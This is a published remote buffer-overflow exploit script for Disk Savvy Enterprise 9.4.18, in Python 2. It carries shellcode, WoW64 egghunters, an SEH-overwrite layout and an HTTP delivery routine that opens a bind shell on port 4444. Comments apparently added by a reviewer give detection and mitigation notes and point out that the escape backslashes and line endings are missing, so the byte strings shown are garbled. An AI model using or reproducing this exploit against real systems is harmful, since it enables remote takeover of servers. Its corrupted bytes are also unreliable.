Disk Savvy Enterprise 9.4.18 Buffer Overflow
Posted on 23 February 2017
# Exploit Title: DiskSavvy Enterprise 9.4.18 - Remote buffer overflow - SEH overwrite with WoW64 egghunters
# Date: 2017-02-22
# Exploit Author: Peter Baris
# Vendor Homepage: www.saptech-erp.com.au
# Software Link: http://www.disksavvy.com/downloads.html
# Version: 9.4.18
# Tested on: Windows 7 Pro SP1 x64 (fully patched) and Windows 10 Pro x64
# WoW64 egghunters are in use in this exploit, meaning it will work on specific 64bit operating systems
# Original Win7 egghunter: https://www.corelan.be/index.php/2011/11/18/wow64-egghunter/ - but I modified it for this exploit
# Win10 WoW64 egghunter only supports x86_64 platform - developed by Peter Baris based on corelan's Win7 version
# If you require a WoW64 egghunter for additional windows versions, contact me through my website http://saptech-erp.com.au/services.php
#
# --- Reviewer notes (defensive summary of what this listing does) ---
# The script builds one HTTP GET request whose request path *is* the payload,
# sends it once to TCP port 80 of <host> (port = 80 below), and closes the
# socket. Nothing is read back; delivery is fire-and-forget.
# The path follows the usual SEH-overwrite layout assembled in `exploit`:
# 2487 bytes of 0x41 fill, a 4-byte next-SEH field (short jump), a 4-byte
# handler address (the author's pop/pop/ret gadget at 0x10142e38, a fixed
# address, i.e. the module it lives in is loaded without ASLR), a small NOP
# sled, a WoW64 egghunter, and then the tagged 355-byte bind-shell payload.
# The second CLI argument ("win7"/"win10") selects which egghunter is used.
# Detection / response notes:
#   - On the wire: a GET whose URI is several thousand bytes of mostly
#     repeated 0x41/0x44 bytes against the product's HTTP listener on port 80.
#     The remaining headers (User-Agent, Referer, Content-Length: 5900, ...)
#     are cosmetic; the payload travels in the request line only.
#   - On the host: per the author's payload comment a successful run leaves a
#     bind shell listening on TCP 4444 in the context of the vulnerable
#     Disk Savvy server process; a new unexpected listener on that port is
#     the post-exploitation observable.
#   - Mitigation: move off 9.4.18; the technique depends on a handler gadget
#     at a fixed address, so presumably SafeSEH/ASLR/DEP-enabled builds of the
#     loaded modules remove the gadget this listing relies on.
# NOTE(review): every "\x" escape in the byte strings below appears to have
# lost its backslash during extraction, and this is Python 2 (print
# statements). The strings are therefore NOT byte-accurate as shown and must
# not be copied into signatures or IoCs without checking the original source.

import socket
import sys

# CLI: <host> win7|win10. Port is hard-coded; only the two arguments are read.
try:
    host = sys.argv[1]
    os = sys.argv[2]  # OS selector; shadows the stdlib module name `os` (not imported here)
    port = 80
except IndexError:
    # Python 2 print statements: this listing does not run under Python 3.
    print "[+] Usage %s <host> win7/win10" % sys.argv[0]
    print "[i] Example: dsavvy.py localhost win10"
    sys.exit()

# 355 bytes bind shell, PORT 4444, bad chars x09x0ax0dx20
# (author's payload; bad chars listed are TAB, LF, CR, SPACE -- the characters
# that would terminate or mangle an HTTP request line)
shell = ("xbax6cxb1x12x02xd9xc7xd9x74x24xf4x5ex33xc9xb1"
"x53x83xeexfcx31x56x0ex03x3axbfxf0xf7x3ex57x76"
"xf7xbexa8x17x71x5bx99x17xe5x28x8axa7x6dx7cx27"
"x43x23x94xbcx21xecx9bx75x8fxcax92x86xbcx2fxb5"
"x04xbfx63x15x34x70x76x54x71x6dx7bx04x2axf9x2e"
"xb8x5fxb7xf2x33x13x59x73xa0xe4x58x52x77x7ex03"
"x74x76x53x3fx3dx60xb0x7axf7x1bx02xf0x06xcdx5a"
"xf9xa5x30x53x08xb7x75x54xf3xc2x8fxa6x8exd4x54"
"xd4x54x50x4ex7ex1exc2xaax7exf3x95x39x8cxb8xd2"
"x65x91x3fx36x1exadxb4xb9xf0x27x8ex9dxd4x6cx54"
"xbfx4dxc9x3bxc0x8dxb2xe4x64xc6x5fxf0x14x85x37"
"x35x15x35xc8x51x2ex46xfaxfex84xc0xb6x77x03x17"
"xb8xadxf3x87x47x4ex04x8ex83x1ax54xb8x22x23x3f"
"x38xcaxf6xaax30x6dxa9xc8xbdxcdx19x4dx6dxa6x73"
"x42x52xd6x7bx88xfbx7fx86x33x12xdcx0fxd5x7excc"
"x59x4dx16x2exbex46x81x51x94xfex25x19xfex39x4a"
"x9axd4x6dxdcx11x3bxaaxfdx25x16x9ax6axb1xecx4b"
"xd9x23xf0x41x89xc0x63x0ex49x8ex9fx99x1exc7x6e"
"xd0xcaxf5xc9x4axe8x07x8fxb5xa8xd3x6cx3bx31x91"
"xc9x1fx21x6fxd1x1bx15x3fx84xf5xc3xf9x7exb4xbd"
"x53x2cx1ex29x25x1exa1x2fx2ax4bx57xcfx9bx22x2e"
"xf0x14xa3xa6x89x48x53x48x40xc9x63x03xc8x78xec"
"xcax99x38x71xedx74x7ex8cx6ex7cxffx6bx6exf5xfa"
"x30x28xe6x76x28xddx08x24x49xf4")

# Fill up to the SEH record; this offset is specific to 9.4.18.
crash = "x41" * 2487
# Handler address: fixed, so the containing module is loaded without ASLR
# (and, being used this way, presumably without SafeSEH).
retn = "x38x2ex14x10" # 0x10142e38 pop edi pop esi ret
# Trailing pad so the request path has a constant total length (author's
# arithmetic; 2505-334-300-100 = 1771 bytes of 0x44).
filler = "x44" * (2505-334-300-100)
# Next-SEH field: short jump (EB 08) over the handler address, NOP-padded.
nseh = "xebx08x90x90"
stack_fill="x41"*100
nops="x90"*8
# Tag the egghunter scans memory for; both hunters below embed the same bytes
# as "x74x30x30x77" (ASCII "t00w"). The payload is prefixed with it twice.
egg = "t00wt00w"

# Egghunter selection. Both variants are the author's hand-assembled WoW64
# hunters (see header); the only difference exposed here is the OS argument.
if os == "win7":
    wow64_egghunter = ("x66x8cxcbx80xfbx23x75x08x31xdbx53x53x53x53xb3xc0"
    "x33xd2"
    "x66x81xcaxffx0fx42x52x80xfbxc0x74x19x6ax02x58xcd"
    "x2ex5ax3cx05x74xefxb8"
    "x74x30x30x77"
    "x89xd7xafx75xe5xafx75xe2xffxe7x6ax26x58x31xc9x89"
    "xe2x64xffx13x5ex5axebxdf")
elif os == "win10":
    wow64_egghunter = ("x66x8cxcbx80xfbx23x75x10x31xd2x66x81xcaxffx0fx31"
    "xdbx42x52x53x53x53xb3xc0x80xfbxc0x74x13x3cx05x74xeexb8"
    "x74x30x30x77"
    "x89xd7xafx75xe4xafx75xe1xffxe7"
    "x6ax29x58x64xffx13x83xc4x0cx5axebxe1")
else:
    # Uses the site-provided `exit` builtin rather than sys.exit; same effect here.
    print "[!] This windows version is not supported yet"
    exit(0)

# Final request path: fill | nSEH | handler | NOPs | hunter | pad | egg | NOPs | shell | pad.
exploit = crash + nseh + retn + nops + wow64_egghunter + stack_fill + egg + nops + shell + filler

# Request assembly. Line terminators (\r\n) appear to have been lost in
# extraction, leaving a trailing space on each header string. The headers are
# decorative; Content-Length: 5900 is sent with no body.
buffer = "GET /"+exploit+" HTTP/1.1 "
buffer+= "Host: "+host+" "
buffer+= "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:44.0) Gecko/20100101 Firefox/44.0 Iceweasel/44.0.2 "
buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 "
buffer+="Accept-Language: en-US,en;q=0.5 "
buffer+="Accept-Encoding: gzip, deflate "
buffer+="Referer: http://"+host+"/login "
buffer+="Connection: keep-alive "
buffer+="Content-Type: application/x-www-form-urlencoded "
buffer+="Content-Length: 5900 "

# Single blocking TCP connection with no timeout and no error handling; a
# failed connect raises and the socket is never closed.
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((host,port))  # socket.connect returns None; `connect` is unused
s.send(buffer)  # one send, no recv: no confirmation of delivery or result
s.close()